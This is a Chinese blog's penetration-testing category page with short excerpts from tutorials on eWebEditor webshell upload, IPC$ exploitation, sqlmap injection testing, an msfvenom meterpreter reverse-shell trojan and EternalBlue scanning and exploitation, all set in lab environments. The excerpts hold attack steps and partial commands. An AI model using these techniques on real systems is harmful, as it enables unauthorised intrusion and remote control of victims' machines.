世纪博客

世纪博客
一个专注于技术学习与资源分享的平台,一路博客站点可以提供各种类型的文章,致力于为互联网上的用户提供一个互相沟通的社区!

渗透测试

这家伙很懒,还没填写该栏目的介绍呢~

渗透测试

eWebEditor--编辑器获取shell

阅读(162)评论(0)

 eWebEditor编辑器getshell  1.登录编辑器后台(默认密码账号admin),也可以找到编辑器的数据库或配置文件查看2.在样式管理中新增样式,并在附件类型中添加 asp 格式的附件类型3.完成后点击预览你新建的样式,上传附件选择你的asp马4.上传完成后点预览,点你上传的文件就可以看到上传地址了,菜刀连接测试。&...

渗透测试

渗透139端口-windows7的IPC$漏洞创建与利用

阅读(319)评论(0)

 IPC$漏洞创建1.靶机地址:192.168.112.112.系统win71.目标机上编辑本地策略,运行 gpedit.msc2.在 计算机配置 >windows设置 >安全设置 >本地策略 >安全选项 中找到 网络访问:本地账户的共享和安全模型 安全设置设为经典3.将 账户:使用空密码的本地账户只允许进行控制台登录 设置...

渗透测试

Kali-SQLmap寻找注入点入侵电脑

阅读(587)评论(0)

SQLmap命令 测试一次入侵注入点:http://192.168.207.131/demo/sql.php?news=1内网搭建的注入点  1.打开kali终端输入-u //目标地址,检查该注入点是否存在注入sqlmap -u "http://192.168.207.131/demo/sql.php?news=1"没有出现红色...

渗透测试

KALI--msfvenom生成远程控制木马入侵win7

阅读(400)评论(0)

远程木马生成入侵Windows木马是之留在计算机里的后门文件,攻击者可以在预留的木马文件进行远程控制测试环境如下win7靶机IP地址:172.16.240.129KALI的IP地址:192.168.17.128利用模块:msfvenom监听端口:66661.输入木马生成语句//示范语句 msfvenom -p windows/meterpreter/rev...

渗透测试

批量扫描445端口-永恒之蓝-Metasploit

阅读(36224)评论(17303)

批量内网扫描永恒之蓝漏洞我们利用kali里面的Metapsloit工具进行渗透测试(结合上一篇永恒之蓝教程文章查看)测试环境如下win7靶机网段地址:192.168.9.1/24利用模块:ms17-010 1.首先打开msfconsole(输入msfc后按Tab键补全)msfconsole2.打开批量扫描模块use auxiliary/scanne...

渗透测试

入侵445端口-永恒之蓝漏洞利用-Metasploit

阅读(36446)评论(17325)

永恒之蓝 WannaCry勒索软件中,利用了NSA泄露工具中的“永恒之蓝”漏洞445端口就是永恒之蓝的入口我们利用kali里面的Metapsloit工具进行渗透测试(不知道Metasploit百度一下)测试环境如下kali的IP:192.168.113.166win7靶机IP:192.168.84.130利用模块:ms17_...

Powered by 小顾 © theme By 世纪博客19021558 http://www.beian.miit.gov.cn

Sitemap